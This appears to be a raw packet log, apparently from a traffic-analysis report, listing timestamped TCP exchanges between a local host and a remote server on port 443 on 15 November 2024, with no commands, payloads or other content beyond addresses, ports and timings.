                                                                                                                    Nov 15, 2024 18:14:15.847851038 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.847855091 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.860810041 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.860878944 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.860882998 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.861558914 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.861613035 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.861618042 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.862149954 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.862210989 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.862215042 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.863300085 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.863362074 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.863367081 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.883987904 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.884059906 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.884082079 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.887981892 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.888047934 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.888067007 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.888171911 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.888242960 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.888247967 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.889786005 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.889849901 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.889854908 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.908879042 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.908957958 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.908963919 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.909167051 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.909224987 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.909229994 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.909297943 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.909353018 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.909363031 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.909457922 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.909518003 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.909522057 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.909682035 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.909739971 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.909744024 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.909821033 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.909876108 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.909879923 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.927110910 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.927176952 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.927189112 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.932282925 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.932348967 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.932354927 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.932480097 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.932533979 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.932538986 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.938823938 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.938886881 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.938893080 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.939021111 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.939100981 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.939105034 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.939332008 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.939394951 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.939399958 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.946574926 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.946638107 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.946644068 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.947805882 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.947868109 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.947874069 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.948837042 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.948894978 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.948900938 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.949245930 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.949301004 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.949305058 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.970252037 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.970351934 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.970374107 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.970958948 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.971050024 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.971055984 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.974630117 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.974689960 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.974694014 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.975882053 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.975943089 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.975948095 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.977300882 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.977364063 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.977368116 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.977556944 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.977616072 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.977621078 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.977701902 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.977756977 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.977761030 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.990767002 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.990839005 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.990844011 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.992405891 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.992466927 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.992474079 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.992624044 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.992692947 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.992697954 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.013499975 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.013591051 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.013756037 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.013756037 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.013773918 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.017261028 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.017339945 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.017353058 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.017739058 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.017806053 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.017817020 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.019629002 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.019697905 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.019710064 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.019954920 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.020023108 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.020035028 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.020232916 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.020303011 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.020313978 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.033634901 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.033711910 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.033724070 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.034302950 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.034466028 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.034476995 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.035665035 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.035734892 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.035748005 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.055567026 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.055772066 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.055783987 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.055943012 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.056010962 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.056021929 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.060276031 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.060364008 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.060375929 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.060791969 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.060857058 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.060869932 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.061858892 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.061923981 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.061935902 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.062886000 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.062952995 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.062966108 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.063585997 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.063657045 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.063668966 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.076452971 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.076544046 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.076562881 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.076940060 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.077102900 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.077115059 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.078351974 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.078422070 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.078433990 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.078600883 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.078661919 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.078672886 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.100097895 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.100207090 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.100220919 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.102876902 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.102953911 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.102965117 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.103351116 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.103423119 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.103435040 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.104365110 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.104435921 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.104446888 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.105469942 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.105568886 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.105580091 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.105768919 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.105842113 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.105853081 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.118659019 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.118829966 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.118841887 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.119770050 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.119852066 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.119863987 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.121130943 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.121206045 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.121218920 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.121330023 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.121407986 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.121418953 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.143309116 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.143413067 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.143459082 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.143479109 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.143618107 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.146146059 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.146231890 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.146244049 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.146845102 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.146917105 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.146928072 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.148168087 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.148248911 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.148260117 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.148485899 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.148607016 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.148618937 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.148921013 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.149007082 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.149019003 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.163127899 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.163273096 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.163285017 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.163995981 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.164233923 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.164246082 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.164266109 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.164355993 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.164366007 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.185489893 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.185630083 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.185642958 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.185683012 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.185848951 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.185859919 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.188935995 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.189007998 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.189018965 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.189997911 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.190124035 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.190135002 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.190709114 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.190782070 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.190793991 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.191992044 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.192084074 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.192095041 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.192322016 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.192413092 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.192424059 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.206042051 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.206130028 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.206140995 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.207067013 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.207139969 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.207151890 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.207631111 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.207703114 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.207714081 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.207799911 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.207865953 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.207875967 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.228465080 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.228617907 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.228630066 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.231945038 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.232042074 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.232053995 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.232114077 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.232182026 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.232193947 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.233128071 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.233212948 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.233223915 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.234720945 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.234802008 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.234812975 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.235003948 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.235078096 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.235090017 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.235640049 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.235730886 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.235745907 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.249876976 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.249974012 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.249985933 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.250232935 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.250439882 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.250442028 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.250454903 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.250529051 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.272383928 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.272496939 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.272511959 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.272573948 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.272644043 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.272723913 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.272735119 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.274974108 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.275048971 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.275060892 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.275418043 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.275490999 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.275502920 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.276738882 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.276812077 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.276823044 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.278212070 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.278284073 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.278295994 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.278424978 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.278491020 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.278501034 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.282203913 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:16.282255888 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:16.282335997 CET49705443192.168.2.5142.215.209.78
